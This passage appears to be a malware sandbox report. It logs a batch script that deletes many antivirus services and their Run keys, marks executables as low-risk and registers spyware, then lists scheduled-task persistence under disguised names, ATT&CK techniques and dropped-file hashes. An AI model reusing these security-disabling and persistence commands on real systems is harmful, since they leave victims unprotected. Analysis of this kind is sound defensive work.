"HKLM\SYSTEM\CurrentControlSet\services\MSK80Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAPExe" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McBootDelayStartSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mccspsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfefire" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\HomeNetSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ModuleCoreService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McMPFSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mcpltsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McProxy" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McODS" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfemms" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAfee SiteAdvisor Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfevtp" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McNaiAnn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\nanosvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\NortonSecurity" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\!SASCORE" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\SBAMSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVAuxSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVCoreSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\QHActiveDefense" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Firewall" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVG Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirMailService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\Avira.ServiceHost" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirWebService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirSchedulerService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsservppl" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ProductAgentService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsserv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\updatesrv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdAgent" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdvirth" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\DragonUpdater" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ekrn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\0247141531883172mcinstcleanup" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\PEFService" /f set "osX=%PROCESSOR_ARCHITECTURE%" if defined PROCESSOR_ARCHITEW6432 set "osX=AMD64" if "%osX%"=="x86" ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg64.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlservice.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -boot" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f ) else ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg64.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlservice.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -boot" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 )4⤵
-
C:\Users\Admin\AppData\Local\Temp\8EFA.exeC:\Users\Admin\AppData\Local\Temp\8EFA.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\8EFA.exeC:\Users\Admin\AppData\Local\Temp\8EFA.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\942B.exeC:\Users\Admin\AppData\Local\Temp\942B.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3092 -s 7322⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3092 -s 7482⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3092 -s 7162⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3092 -s 8922⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3092 -s 8602⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\9B60.exeC:\Users\Admin\AppData\Local\Temp\9B60.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\A0B0.exeC:\Users\Admin\AppData\Local\Temp\A0B0.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\odt\explorer.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "ShellExperienceHost" /sc ONLOGON /tr "'C:\PerfLogs\ShellExperienceHost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "8563" /sc ONLOGON /tr "'C:\Program Files (x86)\Google\Temp\8563.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WerFault" /sc ONLOGON /tr "'C:\Windows\SysWOW64\WimBootCompress\WerFault.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Users\Default\Recent\csrss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\PerfLogs\OfficeClickToRun.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
Modify Registry
3Disabling Security Tools
1Virtualization/Sandbox Evasion
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\install.exeMD5
3319cb474eaa2f3812956b271ff29635
SHA174fbed926e8de14fa5eb6a5a47fb873def72fb81
SHA25679d27a1a2980812c98a473a189158fcc2f77ca82e5720f9e060ff81e5842f27a
SHA512c7139cc744cbafd9618638e7d68e4464da7a6052c10a1906bf7f5ede49128c4f3a05bc49daefbd8a19393887a78a5ca0f7efb3eb06889af9dae0d104870b7347
-
C:\ProgramData\Data\install.exeMD5
3319cb474eaa2f3812956b271ff29635
SHA174fbed926e8de14fa5eb6a5a47fb873def72fb81
SHA25679d27a1a2980812c98a473a189158fcc2f77ca82e5720f9e060ff81e5842f27a
SHA512c7139cc744cbafd9618638e7d68e4464da7a6052c10a1906bf7f5ede49128c4f3a05bc49daefbd8a19393887a78a5ca0f7efb3eb06889af9dae0d104870b7347
-
C:\ProgramData\Runtimebroker.exeMD5
e06bf78c03d9593b593cc3ab09794d29
SHA17e62e808689f789c153c895c8061a44503bfccb2
SHA256e097a312c40c9422a674553bad792cb07acebf24a864766c1b88e62609756177
SHA512330b30933e375806c8e0ab1b94872bd2352c9f0a16d8852e735a6265a4da21b7bc4151ba04d51398008781e83993a6ef0b2d120b9dab1cf46d66562b9d4d8d45
-
C:\ProgramData\Runtimebroker.exeMD5
e06bf78c03d9593b593cc3ab09794d29
SHA17e62e808689f789c153c895c8061a44503bfccb2
SHA256e097a312c40c9422a674553bad792cb07acebf24a864766c1b88e62609756177
SHA512330b30933e375806c8e0ab1b94872bd2352c9f0a16d8852e735a6265a4da21b7bc4151ba04d51398008781e83993a6ef0b2d120b9dab1cf46d66562b9d4d8d45
-
C:\ProgramData\Systemd\HostData.exeMD5
cbf26c74a0a12b5f17ba7596ff6ad19f
SHA16dc733432c290f1fbf5ddda2571b7f538445202b
SHA256095094f579ee811aa3da840541b94bca89a4c899e2236a0995ee655261a68983
SHA5128a562fc0920cb02fe161c359b8fe73ff02e26c9605f970c6f511ad933fe164eceaec8279fdfe3d198837f2f9980a986f82508ee758a1632bcd7ab041152db11b
-
C:\ProgramData\Systemd\HostData.exeMD5
cbf26c74a0a12b5f17ba7596ff6ad19f
SHA16dc733432c290f1fbf5ddda2571b7f538445202b
SHA256095094f579ee811aa3da840541b94bca89a4c899e2236a0995ee655261a68983
SHA5128a562fc0920cb02fe161c359b8fe73ff02e26c9605f970c6f511ad933fe164eceaec8279fdfe3d198837f2f9980a986f82508ee758a1632bcd7ab041152db11b
-
C:\ProgramData\Systemd\config.jsonMD5
a285ac140c8c6806223bfdc02302173e
SHA106ca61cae058c568860858e49615d04dc4a8820d
SHA25636d5713cc13ea15449ab8defc943e42cc657b503a79f0859600ea275598441eb
SHA512f82eae8304aa9ba504eba0e96468fdac08420b0e158c3263a4f47474b02fb5f751b1bd2335e71a33341d81a495083c7dd8e0479e2c48dbaf6a3f7fefb9f4054b
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logMD5
c558fdaa3884f969f1ec904ae7bbd991
SHA1b4f85d04f6bf061a17f52c264c065b786cfd33ff
SHA2563e2559b6ca355d011b05b1fcf35ed8b2375586fe6bb01bc367f24eb8ac82975e
SHA5126523c778fd9fab0085fafe7b4049e591403865212cc25109cb11f11584c7258bc15e0a5524d089d0f662151b22f3f8e6f871091cec57064c69a9a95903f9e7d4
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
968b0bb38e66c0fb89c7dbe8d9d3eddb
SHA1728a021af94e4e1c54eabd0f5809dc1c9a93e737
SHA256dbdd714d26d37f247ae9cb43fa0835cfb7a8c7131717991ff835ee49ca944927
SHA512f7a155bad79bd28cdbcd301ed1ff52b3e71d643656bdd2eb485aa7bc55c726a492fda6d51574b8c225b3b946ab10c1fca778fda012c1e3e60a74909401c25638
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
a146e5dea51bdd0f757d04b4f64bf2bb
SHA1432125e6ba72a10f1102e22a7bdec573256735d8
SHA256464f4d869e5e5c8a16d84234e4182ae6633f9ccd35cc4352855da417a2ffb61d
SHA512f82f0fd65c94d3901a54878bb62aad2acbd813f57e9e1cc3f555da404fb20c7ebc702234cc097ed39f784f2acd0e36df85ea0b18277410783905a8666492cf11
-
C:\Users\Admin\AppData\Local\Temp\7CC7.exeMD5
e987477b0d14b6d7075f0105aa28ba92
SHA154bb1ac38e517b3adf97ccb38b0d3a8ce71b1fab
SHA2564fe326571995d0c02e822c70ad842f70b5f217c4a8dd4ed979f196b60711e00b
SHA512bb6fc302409d60e918d130a48708bd83851b50bda20481436ab65d2091d061e61018617c542cfb8df090f79992ce9393fed2341bd1b8a38af4829a2f4383af68
-
C:\Users\Admin\AppData\Local\Temp\7CC7.exeMD5
